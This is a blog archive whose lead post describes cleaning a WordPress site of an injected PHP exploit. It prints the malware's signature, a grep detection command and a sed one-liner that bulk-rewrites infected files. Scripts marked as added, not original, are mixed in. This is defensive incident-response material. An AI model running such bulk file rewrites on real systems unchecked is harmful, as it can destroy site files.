Blog Archives - sascha.us
https://sascha.us/category/blog/
Sascha Endlicher M.A.'s thoughts and rants

Clean WordPress from PHP Exploit P0358
https://sascha.us/blog/geek-stuff/clean-wordpress-from-php-exploit-p0358/
Mon, 21 Jul 2014 11:03:22 +0000

Last weekend, the website of a popular German WordPress community was hacked. The owner of the site asked for help via the official Facebook fanpage. It was a Saturday afternoon, it was hot outside, the best possible weather to spend time at the pool or lake and, of course, the worst time to get hacked. In the back of my head, an article I had recently read about the German WordPress community was still buzzing around. The article was basically saying that people do not give enough back to the community for what they get. So for me there was no way to let the operator of an aesthetic WordPress community site suffer (even if it was not the German WordPress community). They have provided me with quality content over the last few months, so I decided to call and offer my help.

The hack was a little different than what you typically see done to WordPress sites. It wasn’t a defacement where a fanatic would try to broadcast his fanatical messages to the visitors of the site. In this particular case, I found a code injection in the first line of some PHP files, but the code was dynamic and looked different when you compared compromised files with each other. So I tried to find a signature of the code. I contacted the developer of a wonderful and highly esteemed security suite. My goal was to get more information about the exploit, because the developer’s software detects the exploit as PHP Exploit P0358, but of course I got no answer on the weekend. So I ran a diff on two contaminated files. The result looked like this:

 

[Diff output omitted: the obfuscated PHP code injected into the first line of the two files.]

As you can see from looking at the diff, there is indeed a common signature:

$GLOBALS["%x61%156%x75%156%x61"]=1

Next, I tried to see if the signature comes up in more files:

egrep -irl '%x61%156%x75%156%x61' ./

The result confirmed my suspicion of a common signature. So next up came the question of how to clean the contaminated files. I built the following code and tested it on one file:

sed -i -e "1s/.*/<?php/"

This command replaces the first line of a file with the following content:

<?php

So next, I combined what I had into the following one-liner:

egrep -irl --null '%x61%156%x75%156%x61' ./ | xargs -0 -r sed -i -e "1s/.*/<?php/"

The code recursively searches for files with the signature, starting in the current working directory, and replaces the first line of each affected file with <?php

However, this code has problems with theme files, as a lot of .php files do not start off with the same line. So I cleaned up the theme files manually. Whilst this brought back the functionality of the site, I would strongly recommend hardening the security of the entire site and server. Unfortunately I noticed several things while having a first look at the community’s site.
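
A more conservative cleanup than the one-liner above, as an added example that is not part of the original post: it only touches files whose first line carries the signature, keeps a backup, and strips just the injected prefix so that theme files keep the rest of their first line. It assumes the injected block ends with `?>` directly in front of the file's original `<?php`; the function names, the `.infected.bak` suffix and the sample files are made up for the example.

```shell
#!/bin/sh
# Added example: conservative cleanup for the first-line injection described above.
SIG='%x61%156%x75%156%x61'   # signature string from the post
MARK='?><?php'               # assumed boundary: end of injected block + original opener

# clean_file FILE
#   0  injected prefix removed (backup kept as FILE.infected.bak)
#   1  signature not on line 1, file untouched
#   2  signature on line 1 but no boundary after it, file untouched
#   3  I/O error
clean_file() {
    f=$1
    first=$(head -n 1 -- "$f" 2>/dev/null)
    case $first in *"$SIG"*) ;; *) return 1 ;; esac
    # The boundary must come after the signature, otherwise do not guess.
    case ${first#*"$SIG"} in *"$MARK"*) ;; *) return 2 ;; esac

    cp -p -- "$f" "$f.infected.bak" || return 3
    tmp=$(mktemp) || return 3
    # Line 1: drop everything up to and including the "?>" that closes the
    # injected block; all other lines pass through unchanged.
    if awk -v sig="$SIG" -v mark="$MARK" '
            NR == 1 {
                rest = substr($0, index($0, sig))
                print substr(rest, index(rest, mark) + 2)
                next
            }
            { print }' < "$f" > "$tmp" && cat "$tmp" > "$f"   # cat keeps owner and mode
    then
        rm -f "$tmp"
        return 0
    fi
    rm -f "$tmp"
    return 3
}

# clean_tree DIR: run clean_file on every file containing the signature and
# print one report line per file. File names containing newlines are not handled.
clean_tree() {
    grep -rlF -- "$SIG" "$1" | while IFS= read -r f; do
        case $f in *.infected.bak) continue ;; esac
        rc=0
        clean_file "$f" || rc=$?
        if [ "$rc" -eq 0 ]; then
            echo "cleaned: $f"
        else
            echo "review: $f"
        fi
    done
}

# Constructed sample tree. The "injection" is a harmless stand-in that only
# carries the signature; it is not the payload from the incident.
make_sample_tree() {
    inj='<?php $GLOBALS["'"$SIG"'"]=1; /* constructed stand-in, no payload */ ?>'
    mkdir -p "$1/theme"
    printf '%s\n' "$inj"'<?php' 'echo "core";' > "$1/wp-load.php"
    printf '%s\n' "$inj"'<?php get_header_stub(); ?><html>' '</html>' > "$1/theme/header.php"
    printf '%s\n' '<?php' 'echo "never infected";' > "$1/clean.php"
    printf '%s\n' '<?php' "// note: grep for $SIG" > "$1/notes.php"
}

# Stand-alone demo: sh cleanup.sh demo
if [ "${1:-}" = "demo" ]; then
    d=$(mktemp -d) && make_sample_tree "$d" && clean_tree "$d"
fi
```

Files reported as `review` contain the signature somewhere other than in a recognisable first-line prefix and still need a manual look; the `.infected.bak` copies should be moved out of the web root once the result has been checked.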

Apple Safari Push Notifications
https://sascha.us/blog/geek-stuff/apple-safari-push-notifications/
Mon, 13 Jan 2014 18:06:24 +0000

As you might have noticed when visiting this page, website visitors who are surfing the web with the Safari web browser on Mac OS Mavericks are asked whether they want to receive notifications on future page updates. If you belong to this user group and opt in to Safari Push Notifications, you will receive an alert as soon as I publish a new article or photo. The notification finally appears in your notification center on the Mac.

I promise not to overdo it with my blog posts and photos and I will not send you spam bombs. In Safari, you can go to Settings > Notifications to see an overview of all push notifications you previously opted in to.

I have implemented the notification system for this site. I understand that I only reach about 2 % of all web users who visit my site. There are however similar notification features available for other browsers and I will gradually incorporate similar functions for the users of these browsers.

Whilst implementing the notification feature I noticed a possible security breach. Further on, I have some thoughts on improving the system. As an end user, I have a hard time understanding why I can only subscribe to notifications on my Mac. I am unable to opt in to similar notifications on my other iOS devices. This is particularly odd, as Apple is typically widely praised for its consistent user experience. However, this is not the case with website push notifications.

Let’s assume that I activate the notification function on an airline’s website, as I expect to be notified of any changes to my reserved flight. However, once I leave the house and while I am on my trip with my mobile iOS devices, I will not be notified of gate changes or any other information that might be beneficial for my trip, unless the website automatically synchronizes the data with a user account in the airline’s app. So if the airline’s company website sent me a push notification, I would only be able to see it on my Mac the next time I boot it up. There is clearly room for improvement for v2 of the API.

2checkout incurring foreign fees for US customers https://sascha.us/blog/2checkout-incurring-foreign-fees-for-us-customers/ Fri, 01 Mar 2013 23:14:05 +0000
I have been made aware this week that 2checkout, a very popular payment processor, is no longer processing payments inside the United States, incurring foreign fees for US customers.

2checkout has moved its processing centers outside the US, to Ireland, Germany, Cyprus, and Hong Kong. For customers from the US, this means that they will be charged for a transaction outside of the United States and their bank will most likely charge them an international transaction fee. These fees will vary by bank and the card that has been used to make payment.

I contacted 2checkout and asked them about this, as I could not find any information on their new corporate payment processing policy. They responded as follows:

We are transacting payments through a new payment processor and we will no longer be using our previous payment processor. The changes that you have noted are going to continue and we have no immediate plans to change this information.

A lot of people making payments through 2checkout are from the US just as a lot of 2checkout sellers are. Payment processing with credit and debit cards is still most popular in North America.

In fact, I would say it raises ethical questions when a company lists a US and UK business address on their site and stops processing funds in the US overnight, out of nowhere.

I wonder if they are warning customers ahead of the charge about possible foreign fees in the checkout process.

(photo by Nick Wheeler)

cPanel: why /etc/relayhosts is not necessarily evil https://sascha.us/blog/geek-stuff/cpanel-why-etcrelayhosts-is-not-necessarily-evil/ Fri, 26 Nov 2010 22:49:24 +0000
Last week one of our customers hired a new webmaster. The new webmaster noticed that one of the dedicated IP addresses assigned to his virtual private server was listed on ips.backscatterer.org.
Of course, the first thing you probably do when you find out that you are blacklisted is: panic!
The train of thought associated with this is probably close to this:
“Oh no, I have been blacklisted.”
“Someone must have sent spam from my website.”
“I didn’t send spam and none of my users would!”
“The spam was sent without our approval.”
“Someone must have hacked the server.”

Well, in most cases there is still some truth to this. A lot of servers are poorly managed (if someone cares at all) and a lot of the spam that knocks on our doors comes from hijacked webservers.

Not in this case. The customer was apparently not aware that you can get blacklisted with ips.backscatterer.org for running an auto responder on just one of your email accounts.
The problem with this is that auto responders are very popular and widely used in corporate environments. If we follow Google’s KNOL, we might be convinced that they are cool. So since there are a lot of auto responders out there, backscatterer.org is quite busy blacklisting a lot of IP ranges of service providers who allow their users to have auto responders. As I write this blog post, 154151 IP addresses have been blacklisted by their service. You might wonder why backscatterer.org blocks auto responders in the first place. Well, they try to explain it on their website and whilst they have a few good points, I will leave it up to you to make up your mind on whether auto responders are good for your domain’s users or not. Aside from their decision to block servers using auto responders, this is apparently a lucrative venture for the company behind backscatterer.org. Once blacklisted, you either need to wait 4 weeks to be de-listed or pay a charge of € 75 (a little bit above $100) for an expedited delisting. If you decide that you want to pay, you may wonder who you’re going to do business with. One of the people behind backscatterer.org identifies himself as Claus von Wolfhausen, an apparently highly controversial figure.

Anyway, my point is that our customer got blacklisted for allowing his users to use auto responders, but due to a panic attack, he thought his server was compromised. It’s never a good idea to act when you are panicking.

So our customer logged in to his server and found the /etc/relayhosts file. He found IP addresses from third party service providers in the file and came to the conclusion that a hacker must have added the IP addresses to the file so that he could relay messages through his VPS.

Whilst this might be a viable conclusion, our customer didn’t do further research to make his case. It was so easy though:

The relayhosts file’s IP addresses are automatically added by antirelayd, a cPanel daemon. It checks /var/log/maillog for POP3 or IMAP logins and keeps track of valid ones for use with SMTP relaying.
POP before SMTP or SMTP after POP is a method of authorization that allows users to send e-mail from any location, as long as they can demonstrably also fetch their mail from the same place.
The IPs in the relayhosts file are automatically removed from the list after a while.

I looked up the suspicious IP addresses he had listed in /var/log/maillog and suggested that he might want to disable POP before SMTP after he gave his users enough time to make the required changes in their clients.
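The cross-check described above can be scripted. The following is an added example, not code from the original post or from cPanel: it matches every address in a relayhosts listing against successful POP3/IMAP logins in the mail log. The Dovecot-style log format, the one-address-per-line relayhosts layout, the sample data and all function names are assumptions.

```python
import ipaddress
import re
from collections import defaultdict

# Constructed sample data. The Dovecot-style line format is an assumption;
# adjust LOGIN_RE to whatever your POP3/IMAP daemon actually writes.
SAMPLE_MAILLOG = """\
Nov 26 10:15:02 vps dovecot: pop3-login: Login: user=<alice@example.com>, method=PLAIN, rip=203.0.113.7, lip=192.0.2.10
Nov 26 10:16:40 vps dovecot: imap-login: Disconnected (auth failed, 1 attempts): user=<bob@example.com>, method=PLAIN, rip=198.51.100.23, lip=192.0.2.10
Nov 26 10:20:11 vps dovecot: imap-login: Login: user=<carol@example.com>, method=PLAIN, rip=203.0.113.99, lip=192.0.2.10
Nov 26 10:31:55 vps dovecot: pop3-login: Login: user=<alice@example.com>, method=PLAIN, rip=203.0.113.7, lip=192.0.2.10
"""

# Constructed relayhosts content, assumed to hold one IP address per line.
SAMPLE_RELAYHOSTS = """\
203.0.113.7
203.0.113.99

198.51.100.23
"""

# Only *successful* logins count; failed attempts never match "Login: user=".
LOGIN_RE = re.compile(
    r"(?P<proto>pop3|imap)-login: Login: user=<(?P<user>[^>]*)>"
    r".*?\brip=(?P<rip>[0-9a-fA-F:.]+)"
)


def successful_logins(maillog_text):
    """Map client IP -> set of (protocol, user) for successful logins."""
    logins = defaultdict(set)
    for line in maillog_text.splitlines():
        match = LOGIN_RE.search(line)
        if not match:
            continue
        try:
            ip = ipaddress.ip_address(match.group("rip"))
        except ValueError:
            continue  # malformed address in the log line
        logins[str(ip)].add((match.group("proto"), match.group("user")))
    return logins


def parse_relayhosts(relayhosts_text):
    """Return the valid IP addresses listed in the relayhosts text."""
    ips = []
    for raw in relayhosts_text.splitlines():
        entry = raw.strip()
        if not entry:
            continue
        try:
            ips.append(str(ipaddress.ip_address(entry)))
        except ValueError:
            continue  # skip anything that is not a plain IP address
    return ips


def audit_relayhosts(relayhosts_text, maillog_text):
    """Split relay entries into those backed by a login and those that are not."""
    logins = successful_logins(maillog_text)
    explained, unexplained = {}, []
    for ip in parse_relayhosts(relayhosts_text):
        if ip in logins:
            explained[ip] = sorted(logins[ip])
        else:
            unexplained.append(ip)
    return explained, unexplained


if __name__ == "__main__":
    explained, unexplained = audit_relayhosts(SAMPLE_RELAYHOSTS, SAMPLE_MAILLOG)
    for ip, who in explained.items():
        print(f"{ip}: relay entry explained by logins {who}")
    for ip in unexplained:
        print(f"{ip}: no successful login in this log, check rotated logs")
```

An entry without a matching login is not proof of tampering: the login may sit in a rotated log file, so check those before drawing conclusions.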

By the way, if you have come to this page because you were looking for a way to disable antirelayd, here we go:

You can either disable it in the Service Configuration section under Service Manager of WHM or by running the following command via shell:

/usr/local/cpanel/bin/tailwatchd --disable=Cpanel::TailWatch::Antirelayd

If you want to double check in shell that it has been disabled, try this:

grep Antirelay /usr/local/cpanel/logs/tailwatchd_log

Watch out for a line that says:

Cpanel::TailWatch::Antirelayd was successfully disabled

Alternatively, you can check the status of the tailwatchd process as follows:

/usr/local/cpanel/bin/tailwatchd --status

Google’s mod_pagespeed – are you ready for it? https://sascha.us/blog/geek-stuff/googles-mod_pagespeed-are-you-ready-for-it/ Wed, 17 Nov 2010 23:58:48 +0000
Google recently released mod_pagespeed under an Open Source license. The purpose of this module for the Apache webserver is to optimize content that is delivered by Apache to the end user. You may want to raise your voice at this point and claim that you are already using proper caching techniques on the server side and there is already mod_deflate out there, but mod_pagespeed can be used side by side with mod_deflate and mod_pagespeed is not just about compressing your content.

Further on, you might say that today’s servers are already so fast that it is simply not necessary to fight about milliseconds. Well, Google has apparently a different point of view on this subject and they decided to add a signal to their search algorithm that takes the page load time into account.

So, considering that Google wants you to optimize the speed of your site, what can you do to speed it up? Ironically, the first thing you may want to do is to get rid of Google Analytics. It slows down the page load time significantly and it’s of no good use anyway since Google has decided to allow end users to block the tracking of the Google Analytics code. So since your Google Analytics stats are most likely not accurate any longer and they slow down the page load time, why should you continue to use them? There is no reason to. If you want an accurate analysis, Open Web Analytics is a free alternative that really tracks what you want to keep track of.

Once you have got rid of Google Analytics, you may also want to look into installing YSlow, a free tool from Yahoo! that suggests ways to improve a web site’s speed, and the Firefox Page Speed extension. Do not confuse the Page Speed extension with mod_pagespeed!

So what does mod_pagespeed do? Here are two examples of what mod_pagespeed can optimize on the server side:

  • Caching
    The Apache module can set the HTTP response headers in a way that extends the expiry time of static content, such as CSS, images and JavaScript. Once a user accesses your website, his browser fetches the CSS stylesheets, media files and javascripts and stores them in the client side cache. Next time the user returns to the site, the pages will load faster because the browser will not need to reload that static content from the server, as it is read from local cache files.
  • Minimize Round Trip Times
    Each page may require that the browser performs a series of HTTP requests to the server, 1 request for each javascript, media file or CSS file. So if you have 10 javascripts and 20 images, this would result in 30 requests. Particularly with CSS and javascript files, it makes more sense to combine them into fewer streams, eradicating the need for dozens of requests to fetch one HTML page.

So while this module takes over some of the page optimization work, it does not help you with everything that is considered to be a good practice for page optimization nowadays. I assume future releases of the software will enhance the feature list.

The question I have for you as the reader of this blog however is: are you ready for it? Is the software you are using ready for mod_pagespeed? From my web hosting perspective I can tell you that we won’t jump on that ship for shared hosting customers for the following reasons:

1. This is a new software release. It will have bugs. Web hosts don’t like bugs and they do everything to squish them.

2. The module might do more harm than good as far as the server performance goes: what if the extension affects the CPU too much and it crashes servers?

3. The module has not been tested with the most common content management systems and it will probably never be tested. Will it work with Joomla, Drupal, WordPress? What if it breaks one of these or a third party component? Who will support it? (Yeah, I know the answer).

4. As Google itself points out: it might even bring up new security issues.

With all of this in mind: are you ready for it?

Domain registrations and the little green slimy stickers https://sascha.us/blog/geek-stuff/domain-registrations-and-the-little-green-slimy-stickers/ Thu, 18 Mar 2010 16:26:02 +0000
Our funniest customer ever is Vincent Navarino. He runs his own blog.

It is always a pleasure for me to read his tickets.

Here is an excerpt:

Heya Sascha!

I have 3-4 domain names I’m not using right now but 2 are up for
renewal the 8th of next month and I want to transfer them all to
XXXX. Do I sign them up with you guys first and then set the domains
to transfer on their end?

Also I noticed my spambox is always empty [YAY!] and when I went in
Cpanel to check the configuration it said: Invalid license please
contact assp deluxe for cpanel support. (er 11b). [Boo?]

And just as I tried to send you an email through my mail server it
said the connection failed w/the SMTP server. That might be me
although I didn’t change any settings I’m aware of so I’m sending this
via webmail.

-Vincent Navarino

PS. You ever notice when people say how are you at the end of an email
that it seems they’re being a tad disingenuous? Not me. It’s just that
I remember last what’s important most.

My response:

Howdy,

for the domain registrations, I will need to know the EPP code. It is a little green slimy sticker at the bottom of the domain name (you need to turn it upside down and back). Sometimes it also says Authorization code.
I will look into the ASSP license.

Ciao
Sascha

And his follow up response:

Methinks someone is making fun of me with the sticker thing. Which
come to think of is not hard. So I printed out my domain info on my
laser printer, flipped the page up and back as instructed and there
was no EPP code. You mentioned the sticker was green, a color my
monochrome laser printer cannot produce. So I printed it out on my
brother’s color inkjet printer but sadly he was out of GREEN. There
were only 2 cartridges in his printer, so I figured it was the 3 color
cartridge he needed. It had 3 dots on it, none of them green but since
the other one had a black dot and I know black is not the new green it
had to be the 3 dot one needed.

My brother sensing my need to do this, decided to be a super-prick
although he lacks the foundation for such a thing, forced me to pay
$35 at Office Max to get the color cartridge required to print the EPP
code. So $35? and many hammer blows to my brother’s forehead later, I
cleaned up all the blood, dumped his body in a nearby creek and
printed out the domain info again.

No green sticker! I tried my sister’s laser printer (who by the way
was happy to help me with my brother’s body disposal) and still no
green EPP sticker.

Sensing you might have been mocking me with the whole EPP sticker
info, I did a quick Google search and found out for domain xfers you
need an Authorization code. To be sure, I emailed them about how to
find the green EPP sticker on the back of my domain name and they
started laughing at me asking if I knew Sascha. I tried to lie my way
out of it but they weren’t fooled. They offered to make up some green
EPP stickers for my domains and mail them to me but at this point I
was feeling a tad foolish and silly. Sure I was up $20, my
sister-in-law paid me $55 for the ex-hubby thing but the laughing from
those server people made me sad. The gratuitous puppy-kicking and
baby-slapping I did later made me happy enough to make this reply to
you. Well plaid, sir. Well plaid.

The 2 domains I want to xfer now are with 1&1 hosting. I have a
navarinos.com with godaddy but that’s not up for renewal until later
this year. The domains I’d like to xfer now are:

<snipped>

PS. Are the stickers really slimey?? -Vinny

Digging your own internet grave https://sascha.us/blog/geek-stuff/digging-your-own-internet-grave/ Wed, 17 Mar 2010 17:14:35 +0000
Now, what a title for a blog relaunch.

Though my blog is supposed to have a few rants, I rarely have the feeling that I have to get on it to complain about something.

Today however, I witnessed the most stupid business decision ever.

I happened to provide search engine optimization services for a plastic surgeon living a few miles just outside of Boston, Massachusetts. My customer was not very internet-savvy and she was used to delegating internet related tasks to other people. Her own website was in fact made by one of her clients at the beginning of this millennium. So this former client even paid for her domain registration fees and they had the domain registered through Godaddy. Can you see where this is going? Yes, right, I have been there, done that too many times: she lost contact with the person who registered the domain for her, the person in turn forgot to renew the domain and whoops, the website was offline. That alone is bad, especially when you consider Godaddy’s horrible customer support. What made it even worse was that she had a Google ad campaign running at that time and Google delivered tons of ads that led… yes, straight to internet nirvana.

Eventually, she noticed that she was paying for an ad campaign, but didn’t get any new referrals. The weeks after this incident were a nightmare. Godaddy was ridiculously slow and unwilling to help her get the domain name back online (were they hoping to collect the redemption fees?). Google punished her domain name so badly that she lost her pagerank, and she couldn’t even run new ad campaigns without having to pay a minimum of $10 per click. In 9 years of search engine marketing and optimization, I have never witnessed something like that.

So once the domain name was finally renewed, we moved it to our registration service for her. I ended up spending hours of my free time on the phone with Google support (they were totally clueless by the way, which clearly opposes the image we have of Google as the search engine giant that hires the most brilliant people in the industry), as I felt bad for the client, even though none of this was really our fault. In the end, someone from Google suggested that we register an alternative domain name for the client and start over from scratch with that name, as the old name was going to be punished for a few more months and there was nothing they could do for us.

A few months later, after we brought her websites to the top 10 worldwide Google search results with white hat SEO techniques for some of her important keywords, she decided that she would like to move on to another service provider. I looked at the work they were doing and I’d say they are crossing the line between white hat and black hat SEO. Today we were informed that this new service provider is going to “take over the domain registration” and guess where she is going to have her domain name registered again?

New blog online https://sascha.us/blog/new-blog-online/ Sat, 19 Sep 2009 18:40:38 +0000
Welcome to my new blog area based on WordPress. You’ll find snippets of my photography, thoughts and rants, (net) politics or videos in my personal blog. I am posting either via iOS or from a Mac.
